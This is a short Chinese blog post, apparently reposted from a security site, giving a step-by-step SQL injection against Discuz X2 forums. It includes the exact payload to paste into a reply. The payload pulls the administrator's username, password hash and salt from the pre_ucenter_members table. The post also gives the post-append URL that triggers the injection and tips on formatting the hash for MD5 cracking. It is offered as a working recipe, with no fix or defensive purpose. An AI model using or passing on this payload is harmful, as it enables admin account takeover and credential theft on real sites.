Discuz x2 直接爆出管理用户和密码 - 网站安全 - 自

这个漏洞早就出来了,收集在我电脑里找不到了,写到博客上好记点！

1.注册个用户,登录

2.随便找个帖子回复！

回复内容 ↓

注入语句： a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='

然后到回复补充那里随便补充一下，注入语句就被执行。 补充的地址： forum.php?mod=misc&tid=1396&action=postappend&pid=12026

爆出了管理和密码。 www.2cto.com 格式是这样的： 管理|密码|XXXX

我们这时候要把  密码|XXXX         这里的  |  换成 ：   就是这样  管理|密码：xxxx

 

因为dz的密码是加密的。所以后面还有一个加密。 所以去 MD5 解密的时候记得。MD5：XXX

摘自 小马 blog

查看更多关于Discuz x2 直接爆出管理用户和密码 - 网站安全 - 自的详细内容...